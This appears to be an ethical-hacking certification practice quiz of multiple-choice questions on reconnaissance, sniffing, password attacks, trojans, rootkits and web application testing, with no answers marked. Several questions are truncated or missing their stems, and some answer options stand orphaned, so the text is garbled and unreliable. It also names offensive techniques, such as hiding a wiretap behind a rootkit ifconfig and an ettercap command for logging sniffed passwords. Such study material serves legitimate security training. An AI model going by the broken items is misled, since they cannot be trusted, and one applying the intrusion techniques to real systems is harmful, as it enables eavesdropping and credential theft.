Someone who subscribes to hacker's magazine

What are the three phases of security testing? (Select the Best Answer)

Preparation, Conduct, Conclusion
Preparation, Scans, Conclusion
Reconnaissance, Scans, Reporting
Preparation, Conduct, Billing

 

Clive has been hired to perform a Black-Box test by one of his clients. How much information will Clive be able to get from the client before commencing his test? (Select the Best Answer)

IP Range, OS, and patches installed
Only the IP address range
Nothing but corporate name
All that is available from the client

Which of the following activities would not be considered passive footprinting? (Select the Best Answer)

Go through the rubbish to find out any information that might have been discarded
Search on financial sites such as Yahoo Financial
Scan the range of IP addresses found in their DNS database
Perform multiple queries through a search engine

 

What are the four existing Regional Internet Registries (RIRs)? (Select the Best Answer)

APNIC, PICNIC, ARIN, LACNIC
RIPE NCC, LACNIC, ARIN, APNIC
RIPE NCC, NANIC, ARIN, APNIC
RIPE NCC, ARIN, APNIC, LATNIC

 

When referring to the Domain Name Service, what is a 'zone'? (Select the Best Answer)

It is the first domain that belongs to a company
It is a collection of resource records
It is the first resource record type in the SOA
It is a collection of domains

How does traceroute map the route a packet travels from point A to point B? (Select the Best Answer)

It uses a TCP timestamp packet that will elicit a time exceeded in transit message
It uses a protocol that will be rejected by gateways on its way to the destination
It manipulates the value of the time to live (TTL) within the packet to elicit a time exceeded in transit message
It manipulates the flags within packets to force gateways into generating error messages

What is the purpose of firewalking? (Select the Best Answer)

It's a technique used to discover Wireless networks on foot
It's a technique used to map routers on a network link
It's a technique used to discover what rules are configured on a gateway
It's a technique used to discover interfaces in promiscuous mode

Which of the following would be the best reason for sending a single SMTP message to an address that does not exist within the target company? (Select the Best Answer)

To create a denial of service attack
To verify information about the Mail administrator
To gather information about internal hosts used in email treatment
To gather information about procedures in place to deal with such messages

 

War dialing is a very old attack, as it was depicted in movies that were made years ago. Why would a modern security tester consider making use of such an old technique? (Select the Best Answer)

It is cool, if it works in movies it must work in real life
It allows circumvention of protection mechanisms by being on the internal network
It allows circumvention of company PBX
A good security tester would not use such a derelict technique


most likely to be listening on those ports? (Select the Best Answer)

Finger
FTP
Samba
SMB

Bryce is using the nslookup command to craft queries to list all DNS information (such as Name Servers, host names, MX records, CNAME records, glue records (delegation for child Domains), zone serial number, Time To Live (TTL) records, etc.) for a Domain. What type of function is Bryce trying to accomplish? (Select the Best Answer)

A zone harvesting
A zone transfer
A zone update
A zone estimate

SNMP is a protocol used to query hosts, servers, and devices about performance or health status data. This protocol has long been used by hackers to gather a great amount of information about remote hosts. Which of the following features makes this possible? (Select all that apply)

It uses TCP as the underlying protocol
It uses community strings sent in clear text
It is susceptible to sniffing
It is used by ALL devices on the market

 

Attackers can potentially intercept and modify unsigned SMB packets, modify the traffic and forward it so that the server might perform undesirable actions. Alternatively, the attacker could pose as the server or client after a legitimate authentication and gain unauthorized access to data. Which of the following is NOT a means that can be used to minimize or protect against such an attack? (Select all that apply)

SMB Signing
Timestamps
File permissions


Give users the least amount of privileges

Give users two passwords

Give users a strong policy document 

Bob is doing a password assessment for one of his clients. Bob suspects that policies are not in place and weak passwords are probably the norm throughout the company he is evaluating. Bob is familiar with password weaknesses and key loggers. What are the means that Bob can use to get passwords from his client's hosts and servers? (Select the Best Answer)

Hardware, Software, and Sniffing
Hardware and Software Keyloggers
Passwords are always best obtained using Hardware key loggers
Software only, they are the most effective

Windows LAN Manager (LM) hashes are known to be weak. Which of the following are weaknesses of LM? (Select all that apply)

Converts password to uppercase
Hashes are sent in clear over the network
Makes use of only 32-bit encryption
Effective length is 7 characters

 

An attacker has successfully compromised a remote computer. Which of the following comes as one of the last steps that should be taken to ensure that the compromise cannot be traced back to the source of the problem? (Select the Best Answer)

Install patches
Setup a backdoor
Cover your tracks
Install a zombie for DDOS

A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. What is the most common cause of buffer overflow in software today? (Select the Best Answer)

Bad permissions on files
High bandwidth and large number of users
Usage of non standard programming languages
Bad quality assurance on software produced

 

Which of the following statements would NOT be a proper definition for a Trojan Horse? (Select the Best Answer)

An unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user
A legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user
An authorized program that has been designed to capture keyboard keystrokes while the user is unaware of such activity being performed
Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user

In the context of Trojans, what is the definition of a Wrapper? (Select the Best Answer)

An encryption tool to protect the Trojan
A tool used to bind the Trojan with a legitimate file
A tool used to encapsulate packets within a new header and footer
A tool used to calculate bandwidth and CPU cycles wasted by the Trojan

Neil is very closely monitoring his firewall rules and logs on a regular basis. Some of the users have complained to Neil that there are a few employees who are visiting offensive web sites during work hours, without any consideration for others. Neil knows that he has an up-to-date content filtering system and such access should not be authorized. What type of technique might be used by these offenders to access the Internet without restriction? (Select the Best Answer)

They are using UDP which is always authorized at the firewall
They are using tunneling software which allows them to communicate with protocols in a way it was not intended
They have been able to compromise the firewall, modify the rules, and give themselves proper access
They are using an older version of Internet Explorer that allows them to bypass the proxy server

Virus Scrubbers and other malware detection programs can only detect items they know about. Which of the following tools would allow you to detect unauthorized changes or modification of binary files on your system by unknown malware? (Select the Best Answer)

File integrity verification tools
Anti-Virus Software
A properly configured gateway
There is no way of finding out until a new updated signature file is released

Snort is an open source Intrusion Detection System. However, it can also be used for a few other purposes, such as a sniffer. Which of the choices below are the proper features offered by Snort? (Select the Best Answer)

IDS, Packet Logger, Sniffer
IDS, Firewall, Sniffer
IDS, Sniffer, Proxy
IDS, Sniffer, content inspector

 

Windump is a Windows port of the famous TCPDump packet sniffer available on a variety of platforms. In order to use this tool on the Windows platform you must install a packet capture library. What is the name of this library? (Select the Best Answer)

NTPCAP
LibPCAP
WinPCAP
PCAP

Eric has discovered a fantastic package of tools named Dsniff on the Internet. He learnt to use these tools in his lab and is now ready for real world exploitation. He was able to effectively intercept communications between two entities and establish credentials with both sides of the connections. The two remote ends of the communication never notice that Eric was relaying the information between the two. How would you call this attack? (Select the Best Answer)

Interceptor
Man-in-the-middle
Arp Proxy
Poisoning Attack

Samantha was hired to perform an internal security test of company XYZ. She quickly realized that all networks are making use of switches instead of traditional hubs. This greatly limits her ability to gather information through network sniffing. Which of the following techniques could she use to gather information from the switched network or to disable some of the traffic isolation features of the switch? (Select all that apply)

Ethernet Zapping
MAC Flooding
Sniffing in promiscuous mode
Arp Spoofing

 

What is the goal of a Denial of Service attack? (Select the Best Answer)

Capture files from a remote computer
Render a network or computer incapable of providing normal service
Exploit a weakness in the TCP stack

Bryce the bad boy is purposely sending fragmented ICMP packets to a remote target. The total size of this ICMP packet once reconstructed is over 65,536 bytes. From the information given, what type of attack is Bryce attempting to perform? (Select the Best Answer)

SYN Flood
Smurf
Ping of Death
Fraggle

Clive has been monitoring his IDS and sees that there are a huge number of


Joel and her team have been going through tons of garbage, recycled paper, and other rubbish in order to find some information about the target they are attempting to penetrate. How would you call this type of activity? (Select the Best Answer)

CI Gathering
Scanning
Dumpster Diving
Garbage Scooping

John has performed a scan of the web server with NMAP but did not gather enough information to accurately identify which operating system is running on the remote host. How could you use a web server to help in identifying the OS that is being used? (Select the Best Answer)

Connect to the web server with a browser and look at the web page
Connect to the web server with an FTP client
Telnet to port 8080 on the web server and look at the default page code
Telnet to an open port and grab the banner

 

On a default installation of Microsoft IIS web server, under which privilege is the web server software executed? (Select the Best Answer)

Everyone
Guest
System
Administrator

Barney is looking for a Windows NT/2000/XP command-line tool that can be used to assign, display, or modify ACLs (access control lists) on files or folders and that could also be used within batch files. Which of the following tools can be used for that purpose? (Select the Best Answer)

PERM.exe
CACLS.exe
CLACS.exe
NTPERM.exe

Bob is very security conscious; he is about to test a site that is known to have malicious applets, code, and more. Bob always makes use of a basic Web Browser to perform such testing. Which of the following web browsers can adequately fill this purpose? (Select the Best Answer)

Internet Explorer
Mozilla
Lynx
Tiger

 

While doing web application testing, you might be required to look through multiple web pages online, which can take a long time. Which process below would be a more efficient way of doing this type of validation? (Select the Best Answer)

Use mget utility to download all pages locally for further inspection
Use wget utility to download all pages locally for further inspection
Use get * utility to download all pages locally for further inspection
Use get utility to download all pages locally for further inspection

Jane has just accessed her preferred ecommerce web site and she has seen an item she would like to buy. Jane considers the price a bit too steep; she looks at the page source code and decides to save the page locally to modify some of the page variables. In the context of web application security, what do you think Jane has changed? (Select the Best Answer)

A 'hidden' form field value
A 'hidden' price value
An integer variable
A page cannot be changed locally, it is served by a web server

 

Bob has been hired to do a web application security test. Bob notices that the site is dynamic and must make use of a backend database. Bob wants to validate if a SQL Injection would be possible. What is the first character that Bob should use to attempt breaking a valid SQL request? (Select the Best Answer)

Semicolon
Double Quote
Single Quote
Exclamation Mark

On wireless networks, the SSID is used to identify the network. Why are SSIDs not considered to be a good security mechanism to protect a wireless network? (Select the Best Answer)

The SSID is only 32 bits in length
The SSID is transmitted in clear text
The SSID is the same as the MAC address for all vendors
The SSID is to identify a station, not a network

Melissa is a virus that targeted Microsoft Windows platforms. To which category does this virus belong? (Select the Best Answer)

Polymorphic
Boot Sector infector
System
Macro

 

John is using a special tool on his Linux platform that has a database containing signatures to be able to detect hundreds of vulnerabilities in UNIX, Windows, and commonly-used web CGI scripts. Moreover, the database detects DDoS zombies and Trojans as well. What would be the name of this tool? (Select the Best Answer)

nmap
hping2
nessus
make

 

John is discussing security with Jane; she mentioned a few times to John that she suspects an LKM was installed on her server and this is why it has been acting so erratically lately. LKM stands for Loadable Kernel Module; what does it mean in the context of Linux Security? (Select the Best Answer)

Loadable Kernel Modules are a mechanism for adding functionality to a filesystem without requiring a kernel recompilation
Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel after it has been recompiled and the system rebooted
Loadable Kernel Modules are a mechanism for adding auditing to an operating-system kernel without requiring a kernel recompilation
Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel without requiring a kernel recompilation

SSL has been seen as the solution to a lot of common security problems. Administrators will often make use of SSL to encrypt communications from point A to point B. Why do you think this could be a bad idea if there is an Intrusion Detection System deployed to monitor the traffic between points A and B? (Select the Best Answer)

SSL is redundant if you already have IDS's in place
SSL will trigger rules at regular intervals and force the administrator to turn them off
SSL will slow down the IDS while it is breaking the encryption to see the packet content
SSL will mask the content of the packet and Intrusion Detection Systems are blinded

 

Curt has successfully compromised a web server sitting behind a firewall using a vulnerability in the web server program. He would now like to install a backdoor program but knows that not all ports are open inbound on the firewall. Which port in the list below will most likely be open and allowed to reach the server that Curt has just compromised? (Select the Best Answer)

53
11025


password hashes and stores them for offline cracking. Once cracked, these passwords can provide easy access to whatever network resources the user account has access to. But Jess is not picking up hashes from the network. Why? (Select the Best Answer)

The network protocol is configured to use SMB Signing
The physical network wire is on fibre optic cable
The network protocol is configured to use IPSEC
L0phtCrack SMB sniffing only works through Switches and not Hubs

Joseph the Hacker breaks into Hackcme Corporation's Linux system and plants a wiretap program in order to sniff passwords and user accounts off the wire. The wiretap program is embedded as a trojan in one of the network utilities. Joseph is worried that the network administrator might detect the wiretap program by querying the interfaces to see if they are running in promiscuous mode. Running "ifconfig -a" produces the following:

# ifconfig -a
lo0: flags=849<UP,LOOPBACK,RUNNING,MULTICAST> mtu 8232
        inet 127.0.0.1 netmask ff000000
hme0: flags=863<UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC,MULTICAST> mtu 1500
        inet 192.0.2.99 netmask ffffff00 broadcast 134.5.2.255
        ether 8:0:20:9c:a2:35

What can Joseph do to hide the wiretap program from being detected by the ifconfig command? (Select the Best Answer)

Block output to the console whenever the user runs the ifconfig command by running a screen capture utility
Run the wiretap program in stealth mode to avoid being detected by the ifconfig command
Replace the original ifconfig utility with the rootkit version of ifconfig, hiding Promiscuous information from being displayed on the console
You cannot disable Promiscuous mode detection on Linux systems

 

What does the following command in "Ettercap" do?

ettercap -NCLzs --quiet

(Select the Best Answer)

This command will provide you the entire list of hosts in the LAN
This command will check if someone is poisoning you and will report its IP
This command will detach ettercap from console and log all the sniffed passwords to a file
This command broadcasts ping to scan the LAN instead of ARP requests to all the subnet IPs

------------------- GOOD LUCK ON THE EXAM ---------------------------------------